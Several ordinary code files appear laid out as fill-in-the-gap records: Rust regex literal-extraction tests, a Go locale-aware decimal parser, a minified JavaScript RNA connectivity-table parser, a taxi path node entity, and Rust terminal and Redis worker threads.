let escaped: Vec<u8> = escape_default(byte).collect();
String::from_utf8_lossy(&escaped).into_owned()
}
#[cfg(test)]
mod tests {
use libtww::std::fmt;
use {Expr, ExprBuilder};
use super::{Literals, Lit, escape_bytes};
// To make test failures easier to read.
#[derive(Debug, Eq, PartialEq)]
struct Bytes(Vec<ULit>);
#[derive(Debug, Eq, PartialEq)]
struct Unicode(Vec<ULit>);
fn escape_lits(blits: &[Lit]) -> Vec<ULit> {
let mut ulits = vec![];
for blit in blits {
ulits.push(ULit {
v: escape_bytes(&blit),
cut: blit.is_cut(),
});
}
ulits
}
fn create_lits<I: IntoIterator<Item = Lit>>(it: I) -> Literals {
Literals {
lits: it.into_iter().collect(),
limit_size: 0,
limit_class: 0,
}
}
// Needs to be pub for 1.3?
#[derive(Clone, Eq, PartialEq)]
pub struct ULit {
v: String,
cut: bool,
}
impl ULit {
fn is_cut(&self) -> bool {
self.cut
}
}
impl fmt::Debug for ULit {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
if self.is_cut() {
write!(f, "Cut({})", self.v)
} else {
write!(f, "Complete({})", self.v)
}
}
}
impl PartialEq<Lit> for ULit {
fn eq(&self, other: &Lit) -> bool {
self.v.as_bytes() == &*other.v && self.is_cut() == other.is_cut()
}
}
impl PartialEq<ULit> for Lit {
fn eq(&self, other: &ULit) -> bool {
&*self.v == other.v.as_bytes() && self.is_cut() == other.is_cut()
}
}
#[allow(non_snake_case)]
fn C(s: &'static str) -> ULit {
ULit {
v: s.to_owned(),
cut: true,
}
}
#[allow(non_snake_case)]
fn M(s: &'static str) -> ULit {
ULit {
v: s.to_owned(),
cut: false,
}
}
fn prefixes(lits: &mut Literals, expr: &Expr) {
lits.union_prefixes(expr);
}
fn suffixes(lits: &mut Literals, expr: &Expr) {
lits.union_suffixes(expr);
}
macro_rules! assert_lit_eq {
($which:ident, $got_lits:expr, $($expected_lit:expr),*) => {{
let expected: Vec<ULit> = vec![$($expected_lit),*];
let lits = $got_lits;
assert_eq!(
$which(expected.clone()),
$which(escape_lits(lits.literals())));
assert_eq!(
!expected.is_empty() && expected.iter().all(|l| !l.is_cut()),
lits.all_complete());
assert_eq!(
expected.iter().any(|l| !l.is_cut()),
lits.any_complete());
}};
}
macro_rules! test_lit {
($name:ident, $which:ident, $re:expr) => {
test_lit!($name, $which, $re,);
};
($name:ident, $which:ident, $re:expr, $($lit:expr),*) => {
#[test]
fn $name() {
let expr = Expr::parse($re).unwrap();
let lits = expr.$which();
assert_lit_eq!(Unicode, lits, $($lit),*);
let expr = ExprBuilder::new().allow_bytes(true).unicode(false)
.parse($re).unwrap();
let lits = expr.$which();
assert_lit_eq!(Bytes, lits, $($lit),*);
}
};
}
// ************************************************************************
// Tests for prefix literal extraction.
// ************************************************************************
// Elementary tests.
test_lit!(pfx_one_lit1, prefixes, "a", M("a"));
test_lit!(pfx_one_lit2, prefixes, "abc", M("abc"));
test_lit!(pfx_one_lit3, prefixes, "(?u)☃", M("\\xe2\\x98\\x83"));
test_lit!(pfx_one_lit4, prefixes, "(?ui)☃", M("\\xe2\\x98\\x83"));
test_lit!(pfx_class1,
prefixes,
"[1-4]",
M("1"),
M("2"),
M("3"),
M("4"));
test_lit!(pfx_class2,
prefixes,
"(?u)[☃Ⅰ]",
M("\\xe2\\x85\\xa0"),
M("\\xe2\\x98\\x83"));
test_lit!(pfx_class3,
prefixes,
"(?ui)[☃Ⅰ]",
M("\\xe2\\x85\\xa0"),
M("\\xe2\\x85\\xb0"),
M("\\xe2\\x98\\x83"));
test_lit!(pfx_one_lit_casei1, prefixes, "(?i)a", M("A"), M("a"));
test_lit!(pfx_one_lit_casei2,
prefixes,
"(?i)abc",
M("ABC"),
M("aBC"),
M("AbC"),
M("abC"),
M("ABc"),
M("aBc"),
M("Abc"),
M("abc"));
test_lit!(pfx_group1, prefixes, "(a)", M("a"));
test_lit!(pfx_rep_zero_or_one1, prefixes, "a?");
test_lit!(pfx_rep_zero_or_one2, prefixes, "(?:abc)?");
test_lit!(pfx_rep_zero_or_more1, prefixes, "a*");
test_lit!(pfx_rep_zero_or_more2, prefixes, "(?:abc)*");
test_lit!(pfx_rep_one_or_more1, prefixes, "a+", C("a"));
test_lit!(pfx_rep_one_or_more2, prefixes, "(?:abc)+", C("abc"));
test_lit!(pfx_rep_nested_one_or_more, prefixes, "(?:a+)+", C("a"));
test_lit!(pfx_rep_range1, prefixes, "a{0}");
test_lit!(pfx_rep_range2, prefixes, "a{0,}");
test_lit!(pfx_rep_range3, prefixes, "a{0,1}");
test_lit!(pfx_rep_range4, prefixes, "a{1}", M("a"));
test_lit!(pfx_rep_range5, prefixes, "a{2}", M("aa"));
test_lit!(pfx_rep_range6, prefixes, "a{1,2}", C("a"));
test_lit!(pfx_rep_range7, prefixes, "a{2,3}", C("aa"));
// Test regexes with concatenations.
test_lit!(pfx_cat1, prefixes, "(?:a)(?:b)", M("ab"));
test_lit!(pfx_cat2, prefixes, "[ab]z", M("az"), M("bz"));
test_lit!(pfx_cat3,
prefixes,
"(?i)[ab]z",
M("AZ"),
M("BZ"),
M("aZ"),
M("bZ"),
M("Az"),
M("Bz"),
M("az"),
M("bz"));
test_lit!(pfx_cat4,
prefixes,
"[ab][yz]",
M("ay"),
M("by"),
M("az"),
M("bz"));
test_lit!(pfx_cat5, prefixes, "a*b", C("a"), M("b"));
test_lit!(pfx_cat6, prefixes, "a*b*c", C("a"), C("b"), M("c"));
test_lit!(pfx_cat7, prefixes, "a*b*c+", C("a"), C("b"), C("c"));
test_lit!(pfx_cat8, prefixes, "a*b+c", C("a"), C("b"));
test_lit!(pfx_cat9, prefixes, "a*b+c*", C("a"), C("b"));
test_lit!(pfx_cat10, prefixes, "ab*", C("ab"), M("a"));
test_lit!(pfx_cat11, prefixes, "ab*c", C("ab"), M("ac"));
test_lit!(pfx_cat12, prefixes, "ab+", C("ab"));
test_lit!(pfx_cat13, prefixes, "ab+c", C("ab"));
test_lit!(pfx_cat14, prefixes, "a^", C("a"));
test_lit!(pfx_cat15, prefixes, "$a");
test_lit!(pfx_cat16, prefixes, r"ab*c", C("ab"), M("ac"));
test_lit!(pfx_cat17, prefixes, r"ab+c", C("ab"));
test_lit!(pfx_cat18, prefixes, r"z*azb", C("z"), M("azb"));
test_lit!(pfx_cat19, prefixes, "a.z", C("a"));
// Test regexes with alternations.
test_lit!(pfx_alt1, prefixes, "a|b", M("a"), M("b"));
test_lit!(pfx_alt2,
prefixes,
"[1-3]|b",
M("1"),
M("2"),
M("3"),
M("b"));
test_lit!(pfx_alt3, prefixes, "y(?:a|b)z", M("yaz"), M("ybz"));
test_lit!(pfx_alt4, prefixes, "a|b*");
test_lit!(pfx_alt5, prefixes, "a|b+", M("a"), C("b"));
test_lit!(pfx_alt6, prefixes, "a|(?:b|c*)");
test_lit!(pfx_alt7,
prefixes,
"(a|b)*c|(a|ab)*c",
C("a"),
C("b"),
M("c"),
C("a"),
C("ab"),
M("c"));
test_lit!(pfx_alt8, prefixes, "a*b|c", C("a"), M("b"), M("c"));
// Test regexes with empty assertions.
test_lit!(pfx_empty1, prefixes, "^a", M("a"));
test_lit!(pfx_empty2, prefixes, "^abc", M("abc"));
test_lit!(pfx_empty3, prefixes, "(?:^abc)|(?:^z)", M("abc"), M("z"));
// Make sure some curious regexes have no prefixes.
test_lit!(pfx_nothing1, prefixes, ".");
test_lit!(pfx_nothing2, prefixes, "(?s).");
test_lit!(pfx_nothing3, prefixes, "^");
test_lit!(pfx_nothing4, prefixes, "$");
test_lit!(pfx_nothing6, prefixes, "(?m)$");
test_lit!(pfx_nothing7, prefixes, r"\b");
test_lit!(pfx_nothing8, prefixes, r"\B");
// Test a few regexes that defeat any prefix literal detection.
test_lit!(pfx_defeated1, prefixes, ".a");
test_lit!(pfx_defeated2, prefixes, "(?s).a");
test_lit!(pfx_defeated3, prefixes, "a*b*c*");
test_lit!(pfx_defeated4, prefixes, "a|.");
test_lit!(pfx_defeated5, prefixes, ".|a");
test_lit!(pfx_defeated6, prefixes, "a|^");
test_lit!(pfx_defeated7, prefixes, ".(?:a(?:b)(?:c))");
test_lit!(pfx_defeated8, prefixes, "$a");
test_lit!(pfx_defeated9, prefixes, "(?m)$a");
test_lit!(pfx_defeated10, prefixes, r"\ba");
test_lit!(pfx_defeated11, prefixes, r"\Ba");
test_lit!(pfx_defeated12, prefixes, "^*a");
test_lit!(pfx_defeated13, prefixes, "^+a");
test_lit!(pfx_crazy1,
prefixes,
r"M[ou]'?am+[ae]r .*([AEae]l[- ])?[GKQ]h?[aeu]+([dtz][dhz]?)+af[iy]",
C("Mo\\'am"),
C("Mu\\'am"),
C("Moam"),
C("Muam"));
// ************************************************************************
// Tests for quitting prefix literal search.
// ************************************************************************
macro_rules! test_exhausted {
($name:ident, $which:ident, $re:expr) => {
test_exhausted!($name, $which, $re,);
};
($name:ident, $which:ident, $re:expr, $($lit:expr),*) => {
#[test]
fn $name() {
let expr = Expr::parse($re).unwrap();
let mut lits = Literals::empty();
lits.set_limit_size(20).set_limit_class(10);
$which(&mut lits, &expr);
assert_lit_eq!(Unicode, lits, $($lit),*);
let expr = ExprBuilder::new().allow_bytes(true).unicode(false)
.parse($re).unwrap();
let mut lits = Literals::empty();
lits.set_limit_size(20).set_limit_class(10);
$which(&mut lits, &expr);
assert_lit_eq!(Bytes, lits, $($lit),*);
}
};
}
// These tests use a much lower limit than the default so that we can
// write test cases of reasonable size.
test_exhausted!(pfx_exhausted1, prefixes, "[a-z]");
test_exhausted!(pfx_exhausted2, prefixes, "[a-z]*A");
test_exhausted!(pfx_exhausted3, prefixes, "A[a-z]Z", C("A"));
test_exhausted!(pfx_exhausted4,
prefixes,
"(?i)foobar",
C("FO"),
C("fO"),
C("Fo"),
C("fo"));
test_exhausted!(pfx_exhausted5,
prefixes,
"(?:ab){100}",
C("abababababababababab"));
test_exhausted!(pfx_exhausted6,
prefixes,
"(?:(?:ab){100})*cd",
C("ababababab"),
M("cd"));
test_exhausted!(pfx_exhausted7,
prefixes,
"z(?:(?:ab){100})*cd",
C("zababababab"),
M("zcd"));
test_exhausted!(pfx_exhausted8,
prefixes,
"aaaaaaaaaaaaaaaaaaaaz",
C("aaaaaaaaaaaaaaaaaaaa"));
// ************************************************************************
// Tests for suffix literal extraction.
// ************************************************************************
// Elementary tests.
test_lit!(sfx_one_lit1, suffixes, "a", M("a"));
test_lit!(sfx_one_lit2, suffixes, "abc", M("abc"));
test_lit!(sfx_one_lit3, suffixes, "(?u)☃", M("\\xe2\\x98\\x83"));
test_lit!(sfx_one_lit4, suffixes, "(?ui)☃", M("\\xe2\\x98\\x83"));
test_lit!(sfx_class1,
suffixes,
"[1-4]",
M("1"),
M("2"),
M("3"),
M("4"));
test_lit!(sfx_class2,
suffixes,
"(?u)[☃Ⅰ]",
M("\\xe2\\x85\\xa0"),
M("\\xe2\\x98\\x83"));
test_lit!(sfx_class3,
suffixes,
"(?ui)[☃Ⅰ]",
M("\\xe2\\x85\\xa0"),
M("\\xe2\\x85\\xb0"),
M("\\xe2\\x98\\x83"));
test_lit!(sfx_one_lit_casei1, suffixes, "(?i)a", M("A"), M("a"));
test_lit!(sfx_one_lit_casei2,
suffixes,
"(?i)abc",
M("ABC"),
M("ABc"),
M("AbC"),
M("Abc"),
M("aBC"),
M("aBc"),
M("abC"),
M("abc"));
test_lit!(sfx_group1, suffixes, "(a)", M("a"));
test_lit!(sfx_rep_zero_or_one1, suffixes, "a?");
test_lit!(sfx_rep_zero_or_one2, suffixes, "(?:abc)?");
test_lit!(sfx_rep_zero_or_more1, suffixes, "a*");
test_lit!(sfx_rep_zero_or_more2, suffixes, "(?:abc)*");
test_lit!(sfx_rep_one_or_more1, suffixes, "a+", C("a"));
test_lit!(sfx_rep_one_or_more2, suffixes, "(?:abc)+", C("abc"));
test_lit!(sfx_rep_nested_one_or_more, suffixes, "(?:a+)+", C("a"));
test_lit!(sfx_rep_range1, suffixes, "a{0}");
test_lit!(sfx_rep_range2, suffixes, "a{0,}");
test_lit!(sfx_rep_range3, suffixes, "a{0,1}");
test_lit!(sfx_rep_range4, suffixes, "a{1}", M("a"));
test_lit!(sfx_rep_range5, suffixes, "a{2}", M("aa"));
test_lit!(sfx_rep_range6, suffixes, "a{1,2}", C("a"));
test_lit!(sfx_rep_range7, suffixes, "a{2,3}", C("aa"));
// Test regexes with concatenations.
test_lit!(sfx_cat1, suffixes, "(?:a)(?:b)", M("ab"));
test_lit!(sfx_cat2, suffixes, "[ab]z", M("az"), M("bz"));
test_lit!(sfx_cat3,
suffixes,
"(?i)[ab]z",
M("AZ"),
M("Az"),
M("BZ"),
M("Bz"),
M("aZ"),
M("az"),
M("bZ"),
M("bz"));
test_lit!(sfx_cat4,
suffixes,
"[ab][yz]",
M("ay"),
M("az"),
M("by"),
M("bz"));
test_lit!(sfx_cat5, suffixes, "a*b", C("ab"), M("b"));
test_lit!(sfx_cat6, suffixes, "a*b*c", C("bc"), C("ac"), M("c"));
test_lit!(sfx_cat7, suffixes, "a*b*c+", C("c"));
test_lit!(sfx_cat8, suffixes, "a*b+c", C("bc"));
test_lit!(sfx_cat9, suffixes, "a*b+c*", C("c"), C("b"));
test_lit!(sfx_cat10, suffixes, "ab*", C("b"), M("a"));
test_lit!(sfx_cat11, suffixes, "ab*c", C("bc"), M("ac"));
test_lit!(sfx_cat12, suffixes, "ab+", C("b"));
test_lit!(sfx_cat13, suffixes, "ab+c", C("bc"));
test_lit!(sfx_cat14, suffixes, "a^");
test_lit!(sfx_cat15, suffixes, "$a", C("a"));
test_lit!(sfx_cat16, suffixes, r"ab*c", C("bc"), M("ac"));
test_lit!(sfx_cat17, suffixes, r"ab+c", C("bc"));
test_lit!(sfx_cat18, suffixes, r"z*azb", C("zazb"), M("azb"));
test_lit!(sfx_cat19, suffixes, "a.z", C("z"));
// Test regexes with alternations.
test_lit!(sfx_alt1, suffixes, "a|b", M("a"), M("b"));
test_lit!(sfx_alt2,
suffixes,
"[1-3]|b",
M("1"),
M("2"),
M("3"),
M("b"));
test_lit!(sfx_alt3, suffixes, "y(?:a|b)z", M("yaz"), M("ybz"));
test_lit!(sfx_alt4, suffixes, "a|b*");
test_lit!(sfx_alt5, suffixes, "a|b+", M("a"), C("b"));
test_lit!(sfx_alt6, suffixes, "a|(?:b|c*)");
test_lit!(sfx_alt7,
suffixes,
"(a|b)*c|(a|ab)*c",
C("ac"),
C("bc"),
M("c"),
C("ac"),
C("abc"),
M("c"));
test_lit!(sfx_alt8, suffixes, "a*b|c", C("ab"), M("b"), M("c"));
// Test regexes with empty assertions.
test_lit!(sfx_empty1, suffixes, "a$", M("a"));
// Make sure some curious regexes have no suffixes.
test_lit!(sfx_nothing1, suffixes, ".");
test_lit!(sfx_nothing2, suffixes, "(?s).");
test_lit!(sfx_nothing3, suffixes, "^");
test_lit!(sfx_nothing4, suffixes, "$");
test_lit!(sfx_nothing6, suffixes, "(?m)$");
test_lit!(sfx_nothing7, suffixes, r"\b");
test_lit!(sfx_nothing8, suffixes, r"\B");
// Test a few regexes that defeat any suffix literal detection.
test_lit!(sfx_defeated1, suffixes, "a.");
test_lit!(sfx_defeated2, suffixes, "(?s)a.");
test_lit!(sfx_defeated3, suffixes, "a*b*c*");
test_lit!(sfx_defeated4, suffixes, "a|.");
test_lit!(sfx_defeated5, suffixes, ".|a");
test_lit!(sfx_defeated6, suffixes, "a|^");
test_lit!(sfx_defeated7, suffixes, "(?:a(?:b)(?:c)).");
test_lit!(sfx_defeated8, suffixes, "a^");
test_lit!(sfx_defeated9, suffixes, "(?m)a$");
test_lit!(sfx_defeated10, suffixes, r"a\b");
test_lit!(sfx_defeated11, suffixes, r"a\B");
test_lit!(sfx_defeated12, suffixes, "a^*");
test_lit!(sfx_defeated13, suffixes, "a^+");
// These tests use a much lower limit than the default so that we can
// write test cases of reasonable size.
test_exhausted!(sfx_exhausted1, suffixes, "[a-z]");
test_exhausted!(sfx_exhausted2, suffixes, "A[a-z]*");
test_exhausted!(sfx_exhausted3, suffixes, "A[a-z]Z", C("Z"));
test_exhausted!(sfx_exhausted4,
suffixes,
"(?i)foobar",
C("AR"),
C("Ar"),
C("aR"),
C("ar"));
test_exhausted!(sfx_exhausted5,
suffixes,
"(?:ab){100}",
C("abababababababababab"));
test_exhausted!(sfx_exhausted6,
suffixes,
"cd(?:(?:ab){100})*",
C("ababababab"),
M("cd"));
test_exhausted!(sfx_exhausted7,
suffixes,
"cd(?:(?:ab){100})*z",
C("abababababz"),
M("cdz"));
test_exhausted!(sfx_exhausted8,
suffixes,
"zaaaaaaaaaaaaaaaaaaaa",
C("aaaaaaaaaaaaaaaaaaaa"));
// ************************************************************************
// Tests for generating unambiguous literal sets.
// ************************************************************************
macro_rules! test_unamb {
($name:ident, $given:expr, $expected:expr) => {
#[test]
fn $name() {
let given: Vec<Lit> =
$given
.into_iter()
.map(|ul| {
let cut = ul.is_cut();
Lit { v: ul.v.into_bytes(), cut: cut }
})
.collect();
let lits = create_lits(given);
let got = lits.unambiguous_prefixes();
assert_eq!($expected, escape_lits(got.literals()));
}
};
}
test_unamb!(unambiguous1, vec![M("z"), M("azb")], vec![C("a"), C("z")]);
test_unamb!(unambiguous2,
vec![M("zaaaaaa"), M("aa")],
vec![C("aa"), C("z")]);
test_unamb!(unambiguous3,
vec![M("Sherlock"), M("Watson")],
vec![M("Sherlock"), M("Watson")]);
test_unamb!(unambiguous4, vec![M("abc"), M("bc")], vec![C("a"), C("bc")]);
test_unamb!(unambiguous5, vec![M("bc"), M("abc")], vec![C("a"), C("bc")]);
test_unamb!(unambiguous6, vec![M("a"), M("aa")], vec![C("a")]);
test_unamb!(unambiguous7, vec![M("aa"), M("a")], vec![C("a")]);
test_unamb!(unambiguous8, vec![M("ab"), M("a")], vec![C("a")]);
test_unamb!(unambiguous9,
vec![M("ac"), M("bc"), M("c"), M("ac"), M("abc"), M("c")],
vec![C("a"), C("b"), C("c")]);
test_unamb!(unambiguous10,
vec![M("Mo'"), M("Mu'"), M("Mo"), M("Mu")],
vec![C("Mo"), C("Mu")]);
test_unamb!(unambiguous11,
vec![M("zazb"), M("azb")],
vec![C("azb"), C("z")]);
test_unamb!(unambiguous12, vec![M("foo"), C("foo")], vec![C("foo")]);
// ************************************************************************
// Tests for suffix trimming.
// ************************************************************************
macro_rules! test_trim {
($name:ident, $trim:expr, $given:expr, $expected:expr) => {
#[test]
fn $name() {
let given: Vec<Lit> =
$given
.into_iter()
.map(|ul| {
let cut = ul.is_cut();
Lit { v: ul.v.into_bytes(), cut: cut }
})
.collect();
let lits = create_lits(given);
let got = lits.trim_suffix($trim).unwrap();
assert_eq!($expected, escape_lits(got.literals()));
}
}
}
test_trim!(trim1, 1, vec![M("ab"), M("yz")], vec![C("a"), C("y")]);
test_trim!(trim2, 1, vec![M("abc"), M("abd")], vec![C("ab")]);
test_trim!(trim3, 2, vec![M("abc"), M("abd")], vec![C("a")]);
test_trim!(trim4, 2, vec![M("abc"), M("ghij")], vec![C("a"), C("gh")]);
// ************************************************************************
// Tests for longest common prefix.
// ************************************************************************
macro_rules! test_lcp {
($name:ident, $given:expr, $expected:expr) => {
#[test]
fn $name() {
let given: Vec<Lit> =
$given
.into_iter()
.map(|s: &str| Lit {
v: s.to_owned().into_bytes(),
cut: false,
})
.collect();
let lits = create_lits(given);
let got = lits.longest_common_prefix();
assert_eq!($expected, escape_bytes(got));
}
};
}
test_lcp!(lcp1, vec!["a"], "a");
test_lcp!(lcp2, vec![], "");
test_lcp!(lcp3, vec!["a", "b"], "");
test_lcp!(lcp4, vec!["ab", "ab"], "ab");
test_lcp!(lcp5, vec!["ab", "a"], "a");
test_lcp!(lcp6, vec!["a", "ab"], "a");
test_lcp!(lcp7, vec!["ab", "b"], "");
test_lcp!(lcp8, vec!["b", "ab"], "");
test_lcp!(lcp9, vec!["foobar", "foobaz"], "fooba");
test_lcp!(lcp10, vec!["foobar", "foobaz", "a"], "");
test_lcp!(lcp11, vec!["a", "foobar", "foobaz"], "");
test_lcp!(lcp12, vec!["foo", "flub", "flab", "floo"], "f");
// ************************************************************************
// Tests for longest common suffix.
// ************************************************************************
macro_rules! test_lcs {
($name:ident, $given:expr, $expected:expr) => {
#[test]
fn $name() {
let given: Vec<Lit> =
$given
.into_iter()
.map(|s: &str| Lit {
v: s.to_owned().into_bytes(),
cut: false,
})
.collect();
let lits = create_lits(given);
let got = lits.longest_common_suffix();
assert_eq!($expected, escape_bytes(got));
}
};
}
test_lcs!(lcs1, vec!["a"], "a");
test_lcs!(lcs2, vec![], "");
test_lcs!(lcs3, vec!["a", "b"], "");
test_lcs!(lcs4, vec!["ab", "ab"], "ab");
test_lcs!(lcs5, vec!["ab", "a"], "");
test_lcs!(lcs6, vec!["a", "ab"], "");
test_lcs!(lcs7, vec!["ab", "b"], "b");
test_lcs!(lcs8, vec!["b", "ab"], "b");
test_lcs!(lcs9, vec!["barfoo", "bazfoo"], "foo");
test_lcs!(lcs10, vec!["barfoo", "bazfoo", "a"], "");
test_lcs!(lcs11, vec!["a", "barfoo", "bazfoo"], "");
test_lcs!(lcs12, vec!["flub", "bub", "boob", "dub"], "b");
}
| cut |
decimalformat.go | package lxstrconv
import (
"math"
"strconv"
"unicode"
"unicode/utf8"
"golang.org/x/text/language"
"golang.org/x/text/message"
"golang.org/x/text/number"
)
// acceptRune returns the length of r in bytes if r is the first rune in s,
// otherwise returns zero.
func acceptRune(r rune, s string) int {
if f, ok := firstRune(s); ok && (f == r) {
return utf8.RuneLen(r)
} else {
return 0
}
}
// firstRune returns the first rune in a string and true, or (_, false).
func firstRune(s string) (rune, bool) {
for _, c := range s {
return c, true
}
return runeNone, false
}
// guessDecimalGroupSeparator guesses, for a printer in a given locale,
// the group separator rune in a decimal number system e.g. comma for British.
func guessDecimalGroupSeparator(p *message.Printer) rune {
// heuristic: any rune that appears at least twice is probably the group separator
s := p.Sprint(number.Decimal(1234567890))
return repeatingRune(s)
}
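// For example (illustrative): an English-locale printer renders
// number.Decimal(1234567890) as "1,234,567,890", where ',' is the only
// repeating rune, so it is returned as the group separator.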
// guessDecimalPoint guesses, for a printer in a given locale,
// the decimal point rune in a decimal number system, e.g. period for British.
func guessDecimalPoint(p *message.Printer) rune {
// heuristic: any rune that is common to both these strings is probably a
// decimal point. Concat the strings and find any repeated rune.
s1 := p.Sprint(number.Decimal(1.23))
s2 := p.Sprint(number.Decimal(4.56))
s := s1 + s2
return repeatingRune(s)
}
// guessDecimalDigits guesses, for a printer in a given locale, the digits
// representing the values 0 to 9.
func guessDecimalDigits(p *message.Printer, out *[10]rune) {
for i := 0; i < 10; i++ {
s := []rune(p.Sprint(number.Decimal(i)))
if len(s) == 1 {
out[i] = s[0]
} else {
out[i] = runeNone
}
}
}
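// Illustrative note: for locales using Western Arabic numerals this fills
// out as '0'..'9'; any digit that prints as more than one rune is recorded
// as runeNone and will simply not be recognized while parsing.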
// decimalFormat defines how a decimal (base-10) number should be parsed for a
// given locale. Note that the behaviour is undefined for locales that have
// non-base-10 number systems.
//
// This structure is currently internal until we have more confidence it is
// correct for all languages with decimal number systems.
type decimalFormat struct {
// GroupSeparator is a digits separator such as commas for thousands. In
// addition to any separator defined here, a parser will ignore whitespace.
GroupSeparator rune
// Point is separator between the integer and fractional part of
// a decimal number.
Point rune
// Digits are an ascending list of digit runes
Digits [10]rune
}
func (f decimalFormat) ParseInt(s string) (int64, error) {
if len(s) == 0 { return 0, strconv.ErrSyntax }
value, length, err := f.AcceptInt(s)
if err != nil { return 0, err }
if len(s) != length { return 0, strconv.ErrSyntax }
return value, nil
}
func (f decimalFormat) ParseFloat(s string) (float64, error) {
if len(s) == 0 { return 0, strconv.ErrSyntax }
value, length, err := f.AcceptFloat(s)
if err != nil { return 0, err }
if len(s) != length { return 0, strconv.ErrSyntax }
return value, nil
}
// NewDecimalFormat constructs, for a given locale, a NumberFormat that
// defines how a decimal (base-10) number should be parsed. Note that the
// behaviour is undefined for locales that have non-base-10 number systems.
func NewDecimalFormat(tag language.Tag) NumberFormat {
// Unfortunately, I couldn't find any exported symbols in /x/text that
// gives this information directly (as would be ideal). Therefore this
// function works by printing numbers in the current locale and using
// heuristics to guess the correct separators.
p := message.NewPrinter(tag)
format := decimalFormat{
GroupSeparator: guessDecimalGroupSeparator(p),
Point: guessDecimalPoint(p),
}
guessDecimalDigits(p, &format.Digits)
return format
}
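// Usage sketch (assuming NumberFormat exposes the ParseInt/ParseFloat
// methods implemented on decimalFormat above):
//
//     f := NewDecimalFormat(language.BritishEnglish)
//     n, _ := f.ParseInt("1,234")     // n == 1234 on success
//     v, _ := f.ParseFloat("1,234.5") // v == 1234.5 on success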
// returns (0-9, true) for a decimal digit in any language, or (_, false)
func | (d rune, digits *[10]rune) (int, bool) {
for i := 0; i < 10; i++ {
if d == digits[i] { return i, true }
}
return 0, false
}
// AcceptInt parses as much of an integer number as possible. It returns
// the value of the parsed integer and the length of the characters
// successfully parsed. For example, for some locales, the string "1,000X"
// returns (1000, 5) and the string "foo" returns (0, 0).
//
// The returned err is always one of nil, strconv.ErrRange, or strconv.ErrSyntax.
func (f decimalFormat) AcceptInt(s string) (value int64, length int, err error) {
if len(s) == 0 { return 0, 0, nil }
if s[0] == '-' {
// TODO better negative check e.g. "(1)" for "-1"
v, l, _ := f.AcceptUint(s[1:])
// TODO bounds check
if l > 0 {
return int64(v) * -1, l + 1, nil
} else {
return 0, 0, nil
}
}
// TODO bounds check
v, l, err := f.AcceptUint(s)
return int64(v), l, err
}
// AcceptUint: see AcceptInt
func (f decimalFormat) AcceptUint(s string) (value uint64, length int, err error) {
var accu uint64
for i, c := range s {
if c == f.GroupSeparator {
// pass
} else if unicode.IsSpace(c) {
// pass
} else if d, ok := decimalRuneToInt(c, &f.Digits); ok {
accu *= 10
accu += uint64(d)
// TODO bounds check
} else {
// NOTE: ranging over a string yields byte offsets, so i is already a byte count
return accu, i, nil
}
}
return accu, len(s), nil
}
// AcceptFloat parses as much of a floating point number as possible. It returns
// the value of the parsed float and the length of the characters
// successfully parsed. For example, for some locales, the string "1.23X"
// returns (1.23, 4) and the string "foo" returns (0.0, 0).
//
// The returned err is always one of nil, strconv.ErrRange, or strconv.ErrSyntax.
func (f decimalFormat) AcceptFloat(s string) (value float64, length int, err error) {
var left, right int64
var leftLen, rightLen, pointLen int
var fLeft, fRight float64
// accept leading decimal point
if first, ok := firstRune(s); ok && first != f.Point {
left, leftLen, err = f.AcceptInt(s)
// TODO check err (Currently always nil)
if leftLen == 0 { return 0, 0, nil }
fLeft = float64(left)
}
pointLen = acceptRune(f.Point, s[leftLen:])
if pointLen > 0 && len(s) > leftLen+pointLen && s[leftLen+pointLen] != '-' {
right, rightLen, err = f.AcceptInt(s[leftLen+pointLen:])
// TODO check err (currently always nil)
}
if right > 0 {
fRight = float64(right)
places := float64(1.0 + math.Floor(math.Log10(fRight)))
fRight *= math.Pow(0.1, places)
fRight = math.Copysign(fRight, fLeft)
}
value = fLeft + fRight
length = leftLen + pointLen + rightLen
return value, length, nil
}
| decimalRuneToInt |
function.get_connectivitytable_index.min.js | function | (a){"\n"!=a[a.length-1]&&(a+="\n"),idx={};var b=0,c="",d=a.match(/[^\r\n]+/g);for(var e in d){var f=d[e];if(0==b){var g=f.match(/([0-9]+)(?:\t|[ ]{2,})([^\n]+)/);c=g[2],b=parseInt(g[1]),idx[c]={sequence:"",structure:".".repeat(b)}}else{var g=f.match(/[^\t\ ]+/g);idx[c].sequence+=g[1];var h=parseInt(g[4]);if(0!=h){var i=idx[c].structure.split("");i[h-1]="(",i[parseInt(g[0])-1]=")",idx[c].structure=i.join("")}b-=1}}return idx} | get_connectivitytable_index |
taxi-path-node.js | import r from 'restructure';
import Entity from '../entity';
import { Vec3Float } from '../../types';
export default Entity({
id: r.uint32le,
pathID: r.uint32le,
nodeIndex: r.uint32le,
mapID: r.uint32le,
position: Vec3Float,
flags: r.uint32le,
delay: r.uint32le,
arrivalEventID: r.uint32le, | }); | departureEventID: r.uint32le |
workers.rs | use std::{io, thread, time};
use std::ops::DerefMut;
use std::thread::JoinHandle;
use std::time::Duration;
use crossterm::event::{KeyCode, KeyModifiers};
use crossterm::event;
use crossterm::event::Event::Key;
use flume::{Receiver, Sender};
use log::error;
use r2d2::Pool;
use redis::{Client, Connection, RedisError};
use crate::event::{AppEvent, RedisRequest, RedisResult};
use crate::metric::Metric;
use crate::metric::slow_log::SlowLog;
pub fn setup_terminal_worker(tx: Sender<AppEvent>) -> io::Result<JoinHandle<()>> {
thread::Builder::new().name("terminal-events".into()).spawn(move || loop {
if let Ok(event) = event::read() {
if let Key(key) = event {
if key.code == KeyCode::Char('q') || (key.modifiers == KeyModifiers::CONTROL && key.code == KeyCode::Char('c')) {
if let Err(e) = tx.send(AppEvent::Terminate) {
error!("{}", e);
}
return;
}
}
if let Err(e) = tx.send(AppEvent::Terminal(event)) {
error!("{}", e);
}
}
})
}
pub fn setup_tick_worker(tx: Sender<AppEvent>, tick_rate: Duration) -> io::Result<JoinHandle<()>> {
thread::Builder::new().name("tick-event".into()).spawn(move || loop {
// println!("Tick {:?}", thread::current().name());
if let Err(e) = tx.send(AppEvent::Tick) {
error!("{}", e);
break;
}
thread::sleep(tick_rate);
})
}
pub fn setup_redis_workers(tx: Sender<AppEvent>, rx: Receiver<AppEvent>, worker_number: usize, pool: Pool<Client>) -> io::Result<Vec<JoinHandle<()>>> {
let mut workers = Vec::with_capacity(worker_number);
for i in 0..worker_number {
let rx = rx.clone();
let tx = tx.clone();
let pool = pool.clone();
let name = format!("redis-worker-{}", i);
let worker = thread::Builder::new().name(name).spawn(move || {
// println!("created {:?}", thread::current().name());
loop {
